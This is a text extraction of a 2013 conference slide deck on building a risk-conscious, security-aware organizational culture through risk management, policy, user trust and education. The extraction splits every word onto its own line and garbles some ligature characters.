The document discusses the importance of creating a risk conscious and security aware culture within organizations, emphasizing that risk management can empower business leaders by removing fear associated with security. It outlines the benefits of such a culture, including enhanced protection of information and improved decision-making processes. The author argues that fostering a positive relationship with users and promoting education around security can lead to better compliance and stronger organizational defenses.

1. Changing
the
Mindset:
Crea/ng
a
Risk
Conscious
and
Security
Aware
Culture
Presented
By:
John
P.
Piron*,
CGEIT,
CISA,
CISM,
CISSP,
CRISC,
ISSAP,
ISSMP
President,
IP
Architects,
LLC.
Hacker
Hotshots
July
30,
2013
Copyright
2013
-­‐
IP
Architects,
LLC.,
-­‐
All
Rights
Reserved

2. Agenda
• Using
risk
management
to
remove
the
fear
of
security
• What
is
a
Risk
Aware
and
Security
Conscious
Culture?
• Approaches
to
changing
crea/ng
and
changing
culture
• Final
Thoughts

3. What
is
a
Risk
Conscious
and
Security
Aware
Culture?
• Risk
and
Security
ac/vi/es
are
business
as
usual
considera/ons
– Embraced
as
benefit
to
business
and
not
an
obstacle
to
success
• Threats
and
Risks
are
accurately
iden/fied,
an/cipated,
and
managed
– Fear
Uncertainty
and
Doubt
(FUD)
no
longer
influences
decisions
or
ac/vi/es
• Business
leaders
and
stakeholders
are
empowered
– Able
to
make
informed
and
business
appropriate
risk
management
and
security
decisions
3

4. Benefits
of
a
Risk
Conscious
and
Security
Aware
Culture
• Provides
enhanced
protec/on
to
informa/on
infrastructure
and
data
assets
– Security
is
embraced
instead
of
avoided
• Creates
a
force
mul/plier
– Personnel
ac/vely
assist
in
risk
management
and
security
ac/vi/es
• Security
awareness
empowers
the
organiza/on
– Enables
informed
decision
making
– Understand
business
benefits,
expecta/ons,
and
requirements
4

5. Using
Risk
Management
to
Remove
The
Fear
of
Security
• Business
leaders
and
stakeholders
are
typically
afraid
of
or
annoyed
by
security
– O^en
believe
it
will
create
obstacles
that
will
prevent
them
from
being
successful
– Always
being
told
what
they
cannot
do
by
security
• Risk
management
empowers
business
leaders
and
stakeholders
to
make
appropriate
decisions
about
security
– Stop
telling
them
what
you
think
they
have
to
do
– Help
them
appreciate
the
risks
associated
with
their
op/ons
5

6. Risk
Management
and
Security
vs.
Security
and
Risk
Management
• Mind
of
business
person
-­‐
“Security”
– Preven/on,
disablement,
disempowerment
• Mind
of
business
person
-­‐
“Risk”
– Understanding,
management,
control,
empowerment
• Alignment
with
risk
leads
to
greater
acceptance
then
alignment
with
security
– Both
terminology
and
approach
– Changing
the
mindset
requires
risk
first
and
security
second
approach
6

7. Change
the
Percep/on
and
Ac/ons
• Security
professionals
o^en
use
the
word
“Risk”
when
they
mean
“Threat
and/or
Vulnerability”
– Iden/fy
and
quan/fy
probabili/es
and
impacts
• Without
current
business
intelligence
risk
can
not
be
accurately
or
properly
calculated
– Strategy,
financial,
business
priori/es,
etc.
• Leading
prac/ces
instead
of
best
prac/ces
– Only
you
know
what
is
“best”
for
your
environment
7

8. Business
and
Informa/on
Risk
Profiles
• Iden/fy
risk
tolerances
of
business
leaders
and
stakeholders
– Establish
bounds
of
acceptable
loss,
compromise,
distribu/on,
or
disablement
for
key
business
processes
and
assets
• Informa/on
risk
management
and
security
should
assist
in
their
development
– Assists
in
cul/va/ng
awareness
of
consulta/ve
approach
– Iden/fy
informa/on
threats
and
and
vulnerabili/es
and
associated
likelihoods
and
business
impacts
if
realized
– Iden/fy,
develop,
implement
and
maintain
risk
aligned
control
objec/ves
in
line
with
iden/fied
tolerances
• Business
leaders
will
view
of
Informa/on
Risk
Management
and
Security
(IRMS)
will
change
– Valuable
informa/on
resource
– Protec/ve
and
suppor/ng
func/on
8

9. Security
by
Compliance
–
Fear
the
Auditor
More
Then
The
Aiacker
• Compliance
always
intended
as
the
star/ng
point
not
the
endgame
– Compliance
requirements
will
always
have
to
catch
up
to
aiackers
and
their
capabili/es
• Audit
and
examina/on
findings
have
a
known
business
outcome
and
impact
– Security
threats
and
vulnerabili/es
have
probabili/es
and
poten/ali/es
• Compliance
provides
business
leaders
and
stakeholders
a
way
to
push
back
on
FUD
– Believe
that
they
are
doing
what
can
be
reasonably
expected
of
them
9

10. Policies
and
Standards
First,
Controls
and
Technology
Second
• Policies
and
standards
define
requirements
and
expecta/ons
– Iden/fy
control
objec/ves
– Approved
by
business
leaders
and
stakeholders
• Controls
and
technologies
assist
in
mee/ng
policy
and
standard
requirements
– Technologies
should
not
define
control
objec/ves
or
requirements
– Controls
and
technologies
presented
as
requirements
without
suppor/ng
policies
and
standards
o^en
considered
op/onal
or
ignored
• Proposed
requirements
and
control
objec/ves
should
be
socialized
to
affected
audience
in
advance
of
policy
development
– Iden/fy
areas
of
discomfort
or
discontent
before
developing
policies
and
standards
10

11. Users
–
Your
Greatest
Asset
and
Most
Challenging
Adversaries
• Many
security
professionals
incorrectly
assume
users
are
weakest
link
– User
may
unknowingly
cause
damage
or
harm
– Must
be
protected
from
themselves
• User
intui/on
can
be
a
powerful
control
– Both
detec/ve
and
preventa/ve
– Technical
controls
based
on
“yes”
or
“no”,
user
knows
“Maybe”
• User
trust
is
key
to
cultural
change
– Work
with
users
not
against
them
• Privileged
users
can
cause
the
most
damage
– Business
leaders
o^en
unable
or
unwilling
to
accept
users
may
be
working
against
them
11

12. Trust
But
Verify
• Ideal
way
to
protect
both
users
and
corporate
assets
– Ensures
users
are
not
falsely
accused
– Provides
effec/ve
oversight
control
for
corpora/on
• Make
sure
users
are
made
aware
of
the
existence
of
monitoring
– Existence
alone
may
prevent
malicious
user
from
taking
ac/on
• Privileged
user
ac/vi/es
most
important
to
monitor
– Highest
poten/al
for
material
business
impact
12

13. Embrace
but
Educate
Turning
“No”
Into
“Yes”
• Security
known
for
its
ability
to
say
“No”
– Drives
covert
behaviors
and
ac/ons
• Embrace
but
educate
enables
security
to
say
“Yes”
more
o^en
– Ensures
risks
and
expecta/ons
of
security
are
understood
– Creates
posi/ve
percep/on
of
IRMS
– Reinforces
advisory
and
consulta/ve
approach
• Use
techniques
that
can
be
easily
understood
and
internalized
– Simple
language
– Case
studies
– Examples
13

14. Personal
Benefits
Approach
• Help
individuals
to
help
themselves
– Make
them
want
to
change
their
behaviors
– Change
both
personal
and
professional
behaviors
• Controls
that
restrict
without
context
will
drive
covert
behaviors
– Proac/ve
educa/on
and
personal
benefit
beier
and
o^en
cheaper
control
– Educa/on
of
safe
social
networking
easy
example
to
use
to
champion
approach
• Users
will
embrace
security
if
they
understand
the
universal
benefits
– Remove
the
percep/on
of
security
as
only
a
requirement
of
the
business
– Assist
users
in
deriving
personnel
benefit
and
value
from
security
knowledge
and
guidance
14

15. Final
Thoughts
• Culture
of
an
organiza/on
ul/mately
determines
its
ability
to
protect
itself
• Crea/ng
a
risk
conscious
and
security
aware
culture
is
a
journey
not
a
race
– Requires
careful
aien/on
and
constant
reinforcement
– Ul/mately
provides
highest
return
on
investment
for
protec/on
of
data
assets
and
informa/on
infrastructure
• Change
in
culture
o^en
results
in
conversion
of
malicious
aiacks
from
incidents
to
anomalies
– Liile
to
no
material
business
impact
– Business
will
embrace
the
value
of
Informa/on
Risk
Management
and
Security
15

16. Thank
You
for
Your
Time!
John
P.
Piron*
CGEIT,
CISA,
CISM,
CISSP,
CRISC,
ISSAP,
ISSMP
President,
IP
Architects,
LLC.
jpiron/@iparchitects.com
Copyright
2013
-­‐
IP
Architects,
LLC.,
-­‐
All
Rights
Reserved